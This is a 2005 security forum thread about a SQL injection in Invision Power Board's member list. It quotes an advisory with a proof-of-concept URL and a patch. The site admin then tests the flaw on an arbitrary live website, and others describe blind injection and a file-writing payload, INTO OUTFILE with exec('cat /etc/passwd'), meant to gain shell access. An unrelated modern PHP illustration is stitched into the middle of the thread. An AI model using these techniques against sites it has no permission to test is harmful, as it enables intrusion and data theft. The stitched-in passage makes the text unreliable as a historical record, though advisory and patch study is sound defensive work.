www.waraxe.us Forum Index -> Sql injection -> Sql Injection in Invision Power Board (Page 1 of 2)
Sql Injection in Invision Power Board
Posted: Tue Apr 12, 2005 12:52 pm by waraxe (Site admin)
Just found this advisory:

http://www.securityfocus.com/archive/1/395515/2005-04-09/2005-04-15/0

Quote:

Dcrab's Security Advisory (http://www.digitalparadox.org/services.ah)
[Hsc Security Group] http://www.hackerscenter.com/
[dP Security] http://digitalparadox.org/

Severity: Medium
Title: Invision Board 1.3.1 and below are vulnerable to an SQL injection vulnerability
[PATCH INCLUDED]
Date: 09/04/2005

Vendor: Invision Power Services
Vendor Website: http://www.invisionboard.com/
Summary: Invision Board 1.3.1 and lower are vulnerable to an SQL injection vulnerability
which is caused by missing validation of input in the $this->first variable


**********************************************************************************************************
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more
at http://www.digitalparadox.org/services.ah
**********************************************************************************************************

Proof of Concept Exploit:

http://localhost/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=SQL_INJECTION

**************
Patch info
**************
A patched version of the vulnerable file can be found at http://www.digitalparadox.org/memberlist.txt

Just replace /uploads/sources/memberlist.php with this, and it will be fixed.

A simple patch can be:

In /uploads/sources/memberlist.php on line 274 add this code:
[CODE BEGINS]

if (!is_numeric($this->first)) {
    $this->first = "0";
}

[CODE ENDS]

So it should finally look like this:
[CODE BEGINS]

$this->output .= $this->html->Page_header( array( 'SHOW_PAGES' => $links ) );

//-----------------------------
// START THE LISTING
//-----------------------------
if (!is_numeric($this->first)) {
    $this->first = "0";
}

$DB->query("SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title,
    m.hide_email, m.location, m.aim_name, m.icq_number,
    me.photo_location, me.photo_type, me.photo_dimensions

[CODE ENDS]


Keep yourself updated; RSS feed at: http://digitalparadox.org/rss.ah

Author:
These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com,
please feel free to contact me regarding
these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/.
Look out for my soon-to-come-out book on secure coding with
PHP.




So why not test it in the real world - picked up a random site:

Code:

http://****.com/forums/index.php?act=Members&max_results=30&filter=1&sort_order=asc&sort_key=name&st=f00bar


And we can see a nice debug message:

Code:

There appears to be an error with the *** Community Forums database.
You can try to refresh the page by clicking here, if this does not fix the error, you can contact the board administrator by clicking here

Error Returned


mySQL query error: SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number,
                         me.photo_location, me.photo_type, me.photo_dimensions
                FROM ibf_members m
                  LEFT JOIN ibf_member_extra me ON me.id=m.id
                  LEFT JOIN ibf_groups g ON m.mgroup=g.g_id
                WHERE m.id > 0 AND m.mgroup='1'  AND g.g_hide_from_list <> 1
                ORDER BY m.name asc
                LIMIT f00bar,30

mySQL error: You have an error in your SQL syntax.  Check the manual that corresponds to your MySQL server version for the right syntax to use near 'f00bar,30' at line 8
mySQL error code:
Date: Tuesday 12th of April 2005 08:51:04 AM

We apologise for any inconvenience


So, this SQL injection is in the "LIMIT x,y" section of the query, and as far as I know, it can be useful only in the case of MySQL version >= 4.1 with subquery functionality.
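As an added illustration (not code from the advisory or from Invision Power Board; the function names are assumptions), here are three ways of building the LIMIT clause side by side: the vulnerable interpolation behind the f00bar error above, the advisory's is_numeric() check, and an integer cast that additionally keeps values such as 1e3 or -1 (which is_numeric() accepts) from reaching MySQL and triggering the same verbose database error:

```php
<?php
// Added example, not IPB's own code. $first is the memberlist offset the
// advisory calls $this->first (taken from the "st" URL parameter) and
// $maxResults is the page size. Function names are assumptions.

// Vulnerable pattern (Invision Board <= 1.3.1): the offset is pasted
// straight into the query, so st=f00bar arrives as "LIMIT f00bar,30".
function limitClauseVulnerable($first, $maxResults) {
    return "LIMIT {$first},{$maxResults}";
}

// The advisory's patch: reject anything is_numeric() does not accept.
// This stops injection, but is_numeric() also accepts "1e3", "-1" and
// ".5", which MySQL does not allow after LIMIT, so malformed input can
// still produce the verbose error page shown in the thread.
function limitClauseAdvisoryPatch($first, $maxResults) {
    if (!is_numeric($first)) {
        $first = "0";
    }
    return "LIMIT {$first},{$maxResults}";
}

// Hardened form: force both values to non-negative integers and cap the
// page size, so the clause is well-formed whatever the input was.
function limitClauseHardened($first, $maxResults, $maxPageSize = 100) {
    $start = max(0, (int)$first);                       // "f00bar" casts to 0
    $count = min(max(1, (int)$maxResults), $maxPageSize);
    return sprintf("LIMIT %d,%d", $start, $count);
}

// Constructed inputs: the thread's own probe plus values that pass
// is_numeric() but are not valid LIMIT operands.
$probes = array("30", "f00bar", "1e3", "-1", ".5");
foreach ($probes as $st) {
    printf("%-10s vulnerable=%-16s patched=%-16s hardened=%s\n",
        var_export($st, true),
        limitClauseVulnerable($st, 30),
        limitClauseAdvisoryPatch($st, 30),
        limitClauseHardened($st, 30));
}
```

Run it with the PHP CLI to see that only the hardened form yields a syntactically valid clause for every probe; the page-size cap also limits how much of the member table a single request can pull.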
Posted: Tue Apr 12, 2005 6:34 pm by Alkaen (Regular user)
All steps are okay, but how can I exploit this SQL injection?!

So that means, what do I have to do after the error message appears?

Thanks..
Posted: Wed Apr 13, 2005 4:05 am by shai-tan (Valuable expert)
Does Invision use SHA1? I never knew, and I never used it. I've got a cracked version of vBulletin 3.0 that I've used, but I've never used Invision, trial or full.

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Posted: Wed Apr 13, 2005 11:42 am by waraxe (Site admin)
Alkaen wrote:
All steps are okay, but how can I exploit this SQL injection?!

So that means, what do I have to do after the error message appears?

Thanks..


Well, it's complicated. There is a need for blind SQL attack methods and subqueries (I suggest the benchmark() function). But as far as I know, most of the MySQL databases on the internet right now are version < 4.1.x, and so they have no subquery functionality.
Posted: Wed Apr 13, 2005 11:45 am by shai-tan (Valuable expert)
Yes, I'm still wondering why Fedora Core 3 came with MySQL 3; it baffles me. I noticed the changes in 4.1 though. A lot of people did/do.
Posted: Wed Apr 13, 2005 11:48 am by waraxe (Site admin)
shai-tan wrote:
Yes, I'm still wondering why Fedora Core 3 came with MySQL 3; it baffles me. I noticed the changes in 4.1 though. A lot of people did/do.


Yeah, this is frustrating, when you have found some nice SQL injection hole in some prominent website and then see - b00m - no UNION possibilities.
Wtf? It's the 21st century, webmasters and admins!!! C'mon, we want UNION tricks to be working!! We want subqueries to be working!! And in the future, we want multiple queries on the MySQL/PHP platform too (like now in MSSQL/Oracle).
Posted: Wed Apr 13, 2005 11:51 am by shai-tan (Valuable expert)
They take the things you love and don't bother to give a few things to replace them.
Posted: Fri Apr 15, 2005 1:10 pm by Ratinho (Beginner)
Thank you very much...
Hey..
Posted: Mon Apr 25, 2005 2:40 pm by Dcrab (Valuable expert)
Hey,
Waraxe: you hit the money with that post about frustration lol.. after all that auditing, when you come to know it's not exploitable.. lol, that's frustrating, you probably know what I mean heh. Btw, if you use MSN, catch me at dcrab[at]hackerscenter[dotdotodotdotodotspamdotdotdot]com; it'll be nice to talk to you.
Posted: Mon Apr 25, 2005 4:46 pm by waraxe (Site admin)
Hi, Dcrab! Nice to see ya! So many advisories from you ... it's amazing.
If this continues, then soon I won't have any targets to analyze.
Posted: Mon Apr 25, 2005 6:32 pm by Dcrab (Valuable expert)
haha, I know what you mean.. I have already run out of ideas :p Do you use MSN..?
Re: Sql Injection in Invision Power Board
Posted: Mon Apr 25, 2005 10:21 pm by cXIb8O3 (Active user)
waraxe wrote:

So, this SQL injection is in the "LIMIT x,y" section of the query, and as far as I know, it can be useful only in the case of MySQL version >= 4.1 with subquery functionality.


hym.. look.. if you have the right in MySQL... (INTO), then LIMIT 0,10 INTO OUTFILE '/path/file.php'/*

if you can insert PHP code into m.name, m.id, m.posts, m.joined, m.mgroup, m.email, m.title, m.hide_email, m.location, m.aim_name, m.icq_number, me.photo_location, me.photo_type, me.photo_dimensions (example <? exec('cat /etc/passwd'); ?>)...

then you can include the file.
Re: Sql Injection in Invision Power Board
Posted: Mon Apr 25, 2005 10:29 pm by waraxe (Site admin)
cXIb8O3 wrote:
waraxe wrote:

So, this SQL injection is in the "LIMIT x,y" section of the query, and as far as I know, it can be useful only in the case of MySQL version >= 4.1 with subquery functionality.


hym.. look.. if you have the right in MySQL... (INTO), then LIMIT 0,10 INTO OUTFILE '/path/file.php'/*

if you can insert PHP code into m.name, m.id, m.posts, m.joined, m.mgroup, m.email, m.title, m.hide_email, m.location, m.aim_name, m.icq_number, me.photo_location, me.photo_type, me.photo_dimensions (example <? exec('cat /etc/passwd'); ?>)...

then you can include the file.


From the MySQL manual:

http://dev.mysql.com/doc/mysql/en/select.html

Code:

13.1.7. SELECT Syntax
13.1.7.1. JOIN Syntax
13.1.7.2. UNION Syntax
SELECT
    [ALL | DISTINCT | DISTINCTROW ]
      [HIGH_PRIORITY]
      [STRAIGHT_JOIN]
      [SQL_SMALL_RESULT] [SQL_BIG_RESULT] [SQL_BUFFER_RESULT]
      [SQL_CACHE | SQL_NO_CACHE] [SQL_CALC_FOUND_ROWS]
    select_expr, ...
    [INTO OUTFILE 'file_name' export_options
      | INTO DUMPFILE 'file_name']
    [FROM table_references
      [WHERE where_definition]
      [GROUP BY {col_name | expr | position}
        [ASC | DESC], ... [WITH ROLLUP]]
      [HAVING where_definition]
      [ORDER BY {col_name | expr | position}
        [ASC | DESC] , ...]
      [LIMIT {[offset,] row_count | row_count OFFSET offset}]
      [PROCEDURE procedure_name(argument_list)]
      [FOR UPDATE | LOCK IN SHARE MODE]]


As I understand it, after "LIMIT x,y" only subqueries can be useful, maybe...
But this is right: if we have an SQL injection with an INSERT INTO possibility and the current MySQL user has file operation permissions, then we can try to write out a file with PHP/Perl/whatever code inside, and therefore such an SQL injection can possibly be turned into shell-level access.
Posted: Mon Apr 25, 2005 10:33 pm by waraxe (Site admin)
Dcrab wrote:
haha, I know what you mean.. I have already run out of ideas :p Do you use MSN..?


I prefer a quiet, peaceful life, so no MSN/YM/ICQ/IRC/Skype/cellphone.
But in very rare cases I use Yahoo Messenger. You can email me; I check my mailbox many times a day.
Re: Sql Injection in Invision Power Board
Posted: Mon Apr 25, 2005 10:48 pm by cXIb8O3 (Active user)
waraxe wrote:

mySQL query error: SELECT m.name, m.id, m.posts, m.joined, m.mgroup, m.email,m.title, m.hide_email, m.location, m.aim_name, m.icq_number,
me.photo_location, me.photo_type, me.photo_dimensions
FROM ibf_members m
LEFT JOIN ibf_member_extra me ON me.id=m.id
LEFT JOIN ibf_groups g ON m.mgroup=g.g_id
WHERE m.id > 0 AND m.mgroup='1' AND g.g_hide_from_list <> 1
ORDER BY m.name asc
LIMIT f00bar,30

mySQL error: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'f00bar,30' at line 8
mySQL error code:
Date: Tuesday 12th of April 2005 08:51:04 AM


In this query... we can't use UNION because there is an ORDER BY. ;] But after LIMIT you can use UNION.